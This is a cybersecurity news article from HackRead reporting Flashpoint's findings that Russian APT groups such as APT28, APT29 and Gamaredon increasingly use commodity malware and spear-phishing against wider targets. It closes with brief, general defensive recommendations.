3.  Signal, AI Generated Art Least, Amazon, Facebook Most Invasive Apps

How FHE Technology Is Making End-to-End Encryption a Reality

By Deeba Ahmed
Russian hackers and APT groups are escalating cyberattacks, leveraging readily available malware and broadening their targets beyond governments.…
This is a post from HackRead.com Read the original post: Russian Hackers Shift Tactics, Target More Victims with Paid Malware

Russian hackers and APT groups are escalating cyberattacks, leveraging readily available malware and broadening their targets beyond governments. Flashpoint researchers reveal these evolving tactics and how to protect your organization.

Earlier this week, reports surfaced indicating that state-sponsored groups in Iran are collaborating for large-scale attacks, and similar activities are occurring in Russia. As the Ukraine-Russian War continues, Russian Advanced Persistent Threat (APT) groups are adapting their TTPs and malware, with many sharing delivery techniques and using paid tools instead of custom payloads, revealed researchers at Flashpoint in their latest report.

The researchers have discovered a dangerously fast-paced sophistication in their Tactics, Techniques, and Procedures (TTPs) in recent spear-phishing campaigns and a preference for malware readily available on illegal online marketplaces, making them harder to detect.

One of the phishing emails identified by Flashpoint

While traditionally targeting government and political entities, these groups are now setting their sights on a wider range of victims. The motivations behind these attacks can vary, from espionage and intelligence gathering to financial gain. 

Flashpoint analysts reviewed campaigns by several Russian APT groups in 2024, including APT28, APT29, Gamaredon, Gossamer Bear, UAC-0050, and UAC-0149. Here’s a brief overview of their activities.

APT28 impersonates government organizations in many countries, including Belarus, Poland, and the USA, using free hosting providers to host backdoors targeting Windows systems. APT29 uses droppers and downloaders, including BURNTBATTER, DONUT, and Wineloader whereas APT44-associated hackers mostly target investigative journalists.

Gamaredon, the most active group in the Russia-Ukraine war, uses malicious documents and malware. Gossamer Bear targets Ukraine and NATO countries, while UAC-0050 targets Ukrainian and Polish government organizations. UAC-0149 made headlines in February 2024 after it launched phishing attempts via Signal Messenger.

Researchers also explored Russian APTs killchain, discovering that they mainly rely on HTML-based droppers, such as ROOTSAW and WINELOADER, to execute malicious code. In addition, they use infostealers, commodity malware, or use compromised websites for command and control. NTLM hash stealing is another method frequently used by Russian APT groups.

In its report, Flashpoint pointed out many notorious campaigns from Russian APTs highlighting their evolving TTPs. For instance, in a 2023 campaign, APT29 used a staggering six unique loaders in spear-phishing attempts. Agent Tesla, Remcos, Smokeloader, Snake Keylogger, and Guloader were the most common malware families used in spear-phishing campaigns.

Organizations can protect themselves by reviewing abnormal child processes of HTML and.HTA files, detecting downloads at web proxy, implementing DLL side-loading detections, and reviewing network logs for mock API services.

1.  Microsoft Executives’ Emails Breached by Russia Hackers
2.  Russian Midnight Blizzard Breached Microsoft Source Code
3.  Russian APT28 Abuse Windows Vulnerability with GooseEgg Tool
4.  Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation
5.  Russian Hackers Hit Mail Servers in Europe for Political, Military Intel

Tag

#backdoor